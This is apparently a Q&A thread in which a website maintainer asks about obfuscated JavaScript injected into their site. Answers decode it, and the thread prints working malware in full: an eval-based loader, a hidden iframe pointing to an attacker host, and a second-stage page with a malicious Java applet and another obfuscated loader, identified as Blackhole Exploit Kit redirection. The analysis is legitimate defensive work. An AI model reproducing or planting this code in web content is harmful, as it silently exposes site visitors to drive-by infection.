# What is the purpose of this JavaScript hack?

Tags: javascript, security, xss

This code has been popping up accross a website I've been maintaining, any clue on what's happening here?

```
if (window.document) aa = [] + 0;
aaa = 0 + [];
if (aa.indexOf(aaa) === 0) {
    ss = '';
    try {
        new location(12);
    } catch (qqq) {
        s = String;
        f = 'f' + 'r' + 'o' + 'm' + 'C' + 'har';
        f += 'Code';
    }
    ee = 'e';
    e = window.eval;
    t = 'y';
}
h = Math.round(-4 * Math.tan(Math.atan(0.5)));
n = "3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a57.5a55a49a47.5a57a49.5a21.5a52.5a48a23.5a27a26a24a27a24.5a23.5a23.5a22a48.5a54.5a53.5a22.5a48.5a51a49.5a48.5a52.5a22a55a51a55a30.5a49a47.5a57a49.5a29.5a23a27a49.5a47.5a48.5a49.5a47.5a48.5a48.5a48.5a25.5a25a26a47.5a25.5a24.5a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a57.5a55a49a47.5a57a49.5a21.5a52.5a48a23.5a27a26a24a27a24.5a23.5a23.5a22a48.5a54.5a53.5a22.5a48.5a51a49.5a48.5a52.5a22a55a51a55a30.5a49a47.5a57a49.5a29.5a23a27a49.5a47.5a48.5a49.5a47.5a48.5a48.5a48.5a25.5a25a26a47.5a25.5a24.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");
for (i = 0; i - n.length < 0; i++) {
    j = i;
    ss = ss + s[f](-h * (1 + 1 * n[j]));
}
q = ss;
if (f) e(q);
```

**edit** alerting `q` results in this code

```
if (document.getElementsByTagName('body')[0]) {
            iframer();
        } else {
            document.write("<iframe src='http://update-kb18628311.com/check.php?date=08eaceaccc546a53' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
        }
        function iframer() {
            var f = document.createElement('iframe');
            f.setAttribute('src', 'http://update-kb18628311.com/check.php?date=08eaceaccc546a53');
            f.style.visibility = 'hidden';
            f.style.position = 'absolute';
            f.style.left = '0';
            f.style.top = '0';
            f.setAttribute('width', '10');
            f.setAttribute('height', '10');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
```

From `http://update-kb18628311.com/check.php?date=08eaceaccc546a53`

```
<html>

    <body>
        <applet code='&#80;hoto.class' archive='http://update-kb18628311.com/content&#47;jav2.jar'>
            <param name="p" value="v&#115;sMlgghMA7s6af.dB=3B%ddPJFUgYPMvM-Vc/oAd/G6cr"
            />
        </applet>
        <div style="color:red;">
            <p style="display:none;">ti#y/SNIP/#ti#ye#uw#to#tu#ur#w#qr#y#y#y#-q#qu#ie#ue#up#yy#y#-w#-q#qu</p>
        </div>
        <script>
            ss = 's';
            g = 'g';
            r = 'r';
            d = 'd';
            c = 'c';
            t = 't';
            try {
                new window(123).typ;
            } catch (qq) {
                aa = /s/g.exec("a" + "sd").index + [];
                e = window.eval;
                cc = document;
            }
            aaa = 1 + [];
            i = 0;
            try {
                new btoa({});
            } catch (qqq) {
                if (aaa == aa) for (;;) {
                    a = cc.body[c + 'h' + 'ildNodes'][i];
                    if (a[t + "agName"].toLowerCase() == "div") break;
                    i++;
                }
                try {
                    new btoa(12);
                } catch (qqq) {
                    r += "eplace";
                }
                a = a[c + 'hildNodes'][0].innerHTML;
                a = a[r](/q/g, "1");
                a = a[r](/w/g, "2");
                a = a[r](/e/g, "3");
                a = a[r](/r/g, "4");
                a = a[r](/t/g, "5");
                a = a[r](/y/g, "6");
                a = a[r](/u/g, "7");
                a = a[r](/i/g, "8");
                a = a[r](/o/g, "9");
                a = a[r](/p/g, "0");
            }
            a = a.split("#");
            md = 'a';
            c = [];
            i = 0;
            p = parseInt;
            try {
                new window(123).typ;
            } catch (qqq) {
                qq = String;
            }
            try {
                new btoa(12);
            } catch (qqq) {
                fr = "ode";
            }
            try {
                new window(123).typ;
            } catch (qqq) {
                qq2 = e("qq.fromCharC" + fr);
            }
            if (aaa == aa) {
                while (13153 > i) {
                    vv = a[i];
                    r2 = cc = qq2(40 + 2 + 1 * vv);
                    r = c;
                    if (fr) c = r + r2;
                    i = i + 1;
                }
                w = e;
                w(c);
            }
        </script>
    </body>

</html>
```

Comment: Looks like obfuscated attack code, although I don't see what it does.

Comment: You should probably try to figure out what it does by looking at it in reverse and figuring out how each var is calculated, one by one.

Comment: Nah, you just run it and dump `q` to the console =p

Comment: @GGG: Isn't that how you figure out how stuff is calculated?

Comment: @bvukelic maybe we're saying the same thing, yeah.

Comment: Congratulations, your website is attempting to infect your clients! [Burn it all with fire and next time set your filesystem permissions to prevent web attacks from modifying your files](http://stackoverflow.com/a/6338067/377270)...

Comment: Avast! Anti-Virus now throws up an alert for this very page! ... "**Infection: JS:Redirector-PI [Trj]**"

Answer (score 11):

It injects the following iframe:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://update-kb18628311.com/check.php?date=08eaceaccc546a53' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://update-kb18628311.com/check.php?date=08eaceaccc546a53');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

It's not very complicated, let's go through it (you can verify this all yourself in the console easily):

```
if (window.document) aa = [] + 0;
aaa = 0 + [];
```

If we check the console: `aa === "0"` and `aaa === "0"` so the next if evaluates to true:

```
if (aa.indexOf(aaa) === 0) {
    ss = '';
    try {
        new location(12);
    } catch (qqq) {
        s = String;
        f = 'f' + 'r' + 'o' + 'm' + 'C' + 'har';
        f += 'Code';
    }
    ee = 'e';
    e = window.eval;
    t = 'y';
}
```

All that's done here is we've shortcutted the `eval` function for later use, and built a string `f === "fromCharCode"` that we'll use to call `String.fromCharCode` to convert the ascii code into actual javascript commands in a moment.

```
h = Math.round(-4 * Math.tan(Math.atan(0.5)));
n = "..." // ascii based code
for (i = 0; i - n.length < 0; i++) {
    j = i;
    ss = ss + s[f](-h * (1 + 1 * n[j]));
}
```

In the loop we simply build the string as mentioned. The trig stuff is just to confuse I suppose, although it isn't very confusing.

```
q = ss;
if (f) e(q);
```

And finally the `if(f)` will evaluate to true since `f` is a nonempty string and so we call `e` which is the `eval` shortcut we made earlier, with the string we built from the code. The resulting code I pasted at the top.

Answer (score 7):

this is what the code evaluates to :

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://update-kb18628311.com/check.php?date=08eaceaccc546a53' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://update-kb18628311.com/check.php?date=08eaceaccc546a53');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

It looks like a virus

[image]

So the site you are maintaining is probably vulnerable at some point. someone injected this code into the site; either through XSS and/or SQL Injection

Comment: It could also have been hand-included by a disgruntled employee, uploaded through insecure FTP or SFTP configurations, injected into the code via a _browser_ insecurity over mounted filesystems, lots of different ways it could show up.

Answer (score 2):

Check console output to see what the code is trying to *eval*:

http://jsfiddle.net/AZsGW/

Answer (score 1):

It's a forwarding link to the Blackhole Exploit Kit. It's most likely trying to install Zeus/Zbot on your machine. Protect yourself by disabling JavaScript or running an browser plugin link noscript.